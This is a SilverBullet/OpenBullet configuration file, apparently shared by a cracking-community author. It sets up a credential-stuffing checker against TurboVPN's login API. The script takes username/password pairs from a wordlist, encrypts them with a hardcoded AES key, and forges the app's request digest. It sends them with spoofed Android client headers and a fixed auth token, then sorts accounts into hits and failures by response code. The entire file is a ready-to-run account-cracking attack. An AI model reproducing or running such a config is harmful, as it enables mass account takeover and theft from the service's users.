[SETTINGS]
{
  "Name": "TurboVPN",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2024-09-03T18:23:26.4597424+05:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@TheStarkArmyX",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "TurboVPN",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION RandomString "692?d?d?d?d?d?d" -> VAR "i" 

FUNCTION GenerateGUID -> VAR "id" 

FUNCTION AESEncrypt "N1lnM2dRYlVqWVBGMy9SSA==" "" ECB PKCS7 "{\"user_id\":<i>,\"token\":\"<id>\",\"platform_uid\":\"<USER>\",\"platform_token\":\"<PASS>\",\"platform_type\":4}" -> VAR "au" 

FUNCTION Hash MD5 "{\"user_id\":<i>,\"token\":\"<id>\",\"platform_uid\":\"<USER>\",\"platform_token\":\"<PASS>\",\"platform_type\":4}" -> VAR "dg" 

REQUEST POST "https://1383105207.rsc.cdn77.org/mms/account/v2/oauth/login" 
  CONTENT "<au>" 
  CONTENTTYPE "text/plain" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "host: 1383105207.rsc.cdn77.org" 
  HEADER "x-app-package-name: free.vpn.unblock.proxy.turbovpn" 
  HEADER "x-device-model: Pixel%208%20Pro" 
  HEADER "user-agent: TurboVPN/4.1.2.1(Android)" 
  HEADER "x-device-name: realme%20Narzo%2030" 
  HEADER "x-country: IN" 
  HEADER "x-app-ver-code: 2024083001" 
  HEADER "x-request-digest: <dg>" 
  HEADER "x-app-ver-name: 4.1.2.1" 
  HEADER "x-app-type: 104" 
  HEADER "x-auth-token: c234cfc6659f6207f9dea16b1776bfd3de059284" 
  HEADER "x-nonce: 128886" 
  HEADER "x-accept-encoding: gzip" 
  HEADER "accept-language: en_US" 
  HEADER "x-oauth-token: " 
  HEADER "content-type: text/plain; charset=utf-8" 
  HEADER "content-length: 300" 
  HEADER "accept-encoding: gzip" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "400" 

FUNCTION AESDecrypt "N1lnM2dRYlVqWVBGMy9SSA==" "" ECB PKCS7 "<SOURCE>" -> VAR "a" 

